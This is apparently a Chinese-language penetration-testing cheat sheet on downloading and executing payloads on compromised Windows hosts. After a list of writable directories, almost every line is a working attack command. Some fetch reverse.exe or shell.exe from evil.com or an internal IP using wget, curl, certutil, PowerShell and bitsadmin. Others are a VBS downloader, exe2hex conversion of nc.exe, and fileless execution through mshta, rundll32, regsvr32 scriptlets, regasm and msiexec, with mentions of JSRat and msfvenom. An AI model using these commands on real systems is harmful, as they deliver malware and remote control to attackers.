Windows可写目录
C:\windows\system32\inetsrv\
C:\Windows\Temp\
C:\Users\Public\
C:\windows\system32\spool\PRINTERS\
C:\WINDOWS\IIS Temporary Compressed Files\
C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\Temporary ASP.NET Files
C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files
C:\Documents and Settings\NetworkService\Local Settings\Temp
C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Fileswget
wget http://evil.com/reverse.exe c:/windows/temp/reverse.execurl
curl http://evil.com/reverse.exe -o c:/windows/temp/reverse.execertutil
certutil -urlcache -split -f http://evil.com/reverse.exe c:/windows/temp/reverse.exePowerShell
powershell Invoke-WebRequest -Outfile c:/windows/temp/reverse.exe -Uri http://evil.com/reverse.exe
powershell (new-object Net.WebClient).DownloadFile('http://192.168.203.140/a.ps1','E:\\phpstudy_pro\\WWW\\a.ps1')
powershell -nop -c " Invoke-WebRequest 'https://oss.xdym11235.com/13456.exe' -OutFile 'shell.exe'"bitsadmin
bitsadmin /transfer myDownLoadJob /download /priority normal "http://192.168.203.140/b.ps1" "E:\\phpstudy_pro\\WWW\\b.ps1"VBS
echo Set Post = CreateObject("Msxml2.XMLHTTP") >>download.vbs
echo Set Shell = CreateObject("Wscript.Shell") >>download.vbs
echo Post.Open "GET","http://192.168.203.140/a.ps1",0 >>download.vbs
echo Post.Send() >>download.vbs
echo Set aGet = CreateObject("ADODB.Stream") >>download.vbs
echo aGet.Mode = 3 >>download.vbs
echo aGet.Type = 1 >>download.vbs
echo aGet.Open() >>download.vbs
echo aGet.Write(Post.responseBody) >>download.vbs
echo aGet.SaveToFile "D:/a.ps1",2 >>download.vbsdownload.vbs
Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET","http://192.168.203.140/a.ps1",0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
aGet.SaveToFile "D:/a.ps1",2 Debug
#使用exe2hex或exe2bat.exe在/usr/share/windows-binaries,将exe程序转成hex字符串
exe2hex -x nc.exe -b nc.bat
#或exe2bat.exe nc.exe nc.txt
#exe2hex -x nc.exe -p nc.ps1
执行nc.bat或nc.ps1mshta
mshta.exe是微软Windows操作系统相关程序,英文全称Microsoft HTML Application,可翻译为微软超文本标记语言应用,用于执行.HTA文件,我们可以在本地构建hta文件,之后通过目标主机的mshta来远程下载并执行,例如在本地创建以下hta文件:
<HTML>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD>
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "calc.exe"
self.close
</script>
<body>
demo
</body>
</HEAD>
</HTML>之后在远程目标主机上执行以下命令实现下载执行操作,且无文件落地:
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
mshta http://webserver/payload.hta
mshta \\webdavserver\folder\payload.htarundll32
Rundll32.exe功能是以命令行的方式调用动态链接程序库,系统中还有一个Rundll64.exe文件,它的意思是"执行64位的DLL文件", 其命令行下的使用方法为:Rundll32.exe DLLname,Functionname Arguments,其中DLLname为需要执行的DLL文件名,Functionname为前边需要执行的DLL文件的具体引出函数,Arguments为引出函数的具体参数。
这里我们使用JSRat来做演示,JSRat是一个命令和控制框架,仅为rundll32.exe和regsvr32.exe生成恶意程序,首先我们在本地运行JSRat监听本地1234端口:
之后通过访问client comand 连接客户端执行命令:
rundll32 \\webdavserver\folder\payload.dll,entrypoint
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();.NET中的regasm
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dllregsvr32
regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
regsvr32 /u /s /i:<http://site.com/js.png> scrobj.dll
js.png
<?XML version="1.0"?>
<scriptlet>
<registration
progid="ShortJSRAT"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Learn from Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
ps = "cmd.exe /c calc.exe";
new ActiveXObject("WScript.Shell").Run(ps,0,true);
]]>
</script>
</registration>
</scriptlet>msiexec
msiexec是windows自带的cmd工具,支持远程下载功能,攻击者可以将msi文件上传到服务器并执行,下面通过一个实例做演示说明,首先我们通过msfvenom来构造一个恶意的msi程序(这里以弹计算器为例,在实战中可以根据需要进行修改),并启动一个简易HTTP服务
msiexec /q /i http://192.168.174.131:1234/evil.msicertutil详解
https://mp.weixin.qq.com/s/T7k_hA4fvlWhy7VmzoqG6Q
Comments | NOTHING